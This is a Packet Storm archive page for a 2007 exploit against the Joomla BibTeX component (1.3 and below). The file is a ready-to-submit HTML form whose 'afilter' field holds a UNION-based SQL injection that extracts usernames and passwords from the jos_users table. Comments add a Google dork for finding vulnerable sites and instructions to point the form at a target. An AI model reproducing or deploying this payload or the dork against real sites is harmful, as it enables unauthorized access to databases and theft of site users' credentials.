exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

joomlabibtext-sql.txt

joomlabibtext-sql.txt
Posted Aug 24, 2007
Authored by ajann

BibTeX Joomla component versions 1.3 and below remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 1c22c4bc295e0d7f78966f02e037d618badf6a77b5a987209a94bfedaee7595e

joomlabibtext-sql.txt

Change Mirror Download
<html>
<head>
<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>
</head>
<body>

<!-- # Title : Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->
<!-- # Author : ajann -->
<!-- # Contact : :( -->
<!-- # S.Page : http://www.everythingthatiknowabout.com -->
<!-- # $$ : Free -->
<!-- # Dork : inurl:index.php?option=com_jombib -->
<!-- # DorkEx : http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
<!-- # .. -->
<!-- # TURKEY -->

<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->




<form action="...." method="post" name="adminForm">

<table>
<tr>
<td valign="bottom">
Autore
<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>
<td valign="bottom">
Titolo
<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>

<td valign="bottom">
<input type="submit" value="Direct Submit"/>
</td>
<td valign="bottom">
&nbsp;&nbsp;&nbsp;Ordina&nbsp;
<select name="order" class="inputbox" size="1" onchange="document.adminForm.submit();">
<option value="ryear" selected="selected">Date desc</option>
<option value="year">Date asc</option>

<option value="title">Title asc</option>
<option value="rtitle">Title desc</option>
<option value="author">Author asc</option>
<option value="rauthor">Author desc</option>
<option value="journal">Journal asc</option>
<option value="rjournal">Journal desc</option>

<option value="type">Type</option>
</select>
</td >
<td nowrap="nowrap" valign="bottom">
&nbsp;&nbsp;&nbsp;Mostra&nbsp;
<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&&order=ryear&limit=' + this.options[selectedIndex].value + '&limitstart=0';">
<option value="5">5</option>
<option value="10">10</option>

<option value="15">15</option>
<option value="20">20</option>
<option value="25">25</option>
<option value="30">30</option>
<option value="50" selected="selected">50</option>
</select>
</td>

</tr>
</table>


<input type="hidden" name="option" value="com_jombib" />
<input type="hidden" name="catid" value="$catId" />
</form>

</body>
</html>
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close